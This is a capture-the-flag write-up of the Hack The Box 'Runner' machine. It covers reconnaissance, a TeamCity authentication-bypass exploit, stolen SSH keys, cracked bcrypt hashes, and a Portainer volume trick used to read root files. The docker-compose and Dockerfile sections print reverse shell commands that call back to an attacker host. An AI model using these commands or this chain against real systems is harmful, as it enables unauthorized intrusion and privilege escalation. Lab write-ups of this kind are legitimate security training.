Runner

Created At: Updated At:

Recon

nmap

$nmap -A runner.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 08:18 UTC
Nmap scan report for runner.htb (10.129.182.43)
Host is up (0.033s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

dirbuster

ffuf

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://FUZZ.runner.htb' -fc 302 -t 200

Does not give any resoults.

port 8000

It hosts NSCA(Nagios Service Check Acceptor) Nagios addon.
https://answerhub.nagios.com/support/s/article/Using-the-NSCA-Addon-8b43111e
https://support.nagios.com/kb/article/nsca-overview-78.html

It seems to be one of the products of system monitoring solutions firm.
https://www.nagios.com/products/

It only recieves input from monitoring services and after further some research it seems like a dead end.

gobuster

Running gobuster with larger n0kovo subdomains list in vhost enumeration mode finally gives us some resoults.

$gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://runner.htb  --append-domain -t 150
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://runner.htb
[+] Method:          GET
[+] Threads:         150
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: teamcity.runner.htb Status: 401 [Size: 66]

CVE-2023-42793

https://www.exploit-db.com/exploits/51884

We are finally logged in somewhere.

TeamCity

In team city, we can create a new project with build steps. Similarly to Jenkins, this can be used for getting reverse shell.

or that would be the case, if we couldnt just go to the admin panel and see all users including admin.

We can also get a backup of everything…

… and instead of searching in the gui, we can just find ssh keys.

ssh -i ./id_rsa john@runner.htb allows us to log in as john and get the user flag.

Priv Esc

LinEnum

LinEnum returns nothing as usually.

Portainer

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -                   
tcp        0     76 10.129.182.43:22        10.10.14.81:42262       ESTABLISHED -                   
tcp        0      0 127.0.0.1:54050         127.0.0.1:9000          TIME_WAIT   -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::8000                 :::*                    LISTEN      - 
john@runner:/tmp$ ls /data
bin  certs  chisel  compose  docker_config  portainer.db  portainer.key  portainer.pub  teamcity_server  tls

Using ssh tunneling ssh -i ./id_rsa -L 8082:localhost:9000 john@runner.htb , we can see that port 9000 is portainer, unfortunetly behind a password.

Port 8111 is TeamCity.

In backup we can also find users file, hashed with bcrypt.

ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$cQmbW7GA2NePss1vKY8RleSQ8kPMiU6av/N5m00mFHthv69NBBXOW, John, john@runner.htb, 1723627560076, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, city_adminq8dt, $2a$07$WJrTewhBjMRJGvEil6mxROo8RWeFimky0wPZt3pRvVgICHP61NlqG, , angry-admin@funnybunny.org, 1723628900193, BCRYPT

Using john we get password for matthew, which is piper123.
We can use it to log into portainer.

yaml

In custom templates, we can create our own reverse shell template:

version: '3.8'

services:
  shell_reverse:
    image: alpine:latest
    container_name: shell_reverse
    command: sh -c "sh -i >& /dev/udp/10.10.14.81/4242 0>&1"
    restart: unless-stopped

But then we learn that deploying the stack is reserved for admin users.

Creating dockerfile

We can try to create a malicious docker file and upload it manualy.

mkdir shell_reverse
cd shell_reverse
touch Dockerfile
echo 'FROM alpine:latest' > Dockerfile
echo 'CMD sh -c "sh -i >& /dev/udp/10.0.0.1/4242 0>&1"' > Dockerfile
docker build -t shell_reverse .

But we cant deploy anything that is not from docker.io.

Getting flag with volume

We have to create volume:

Then we have to attach it to a new container, for example teamcity.
After connecting as root to the container, we can see in /mnt the root flag.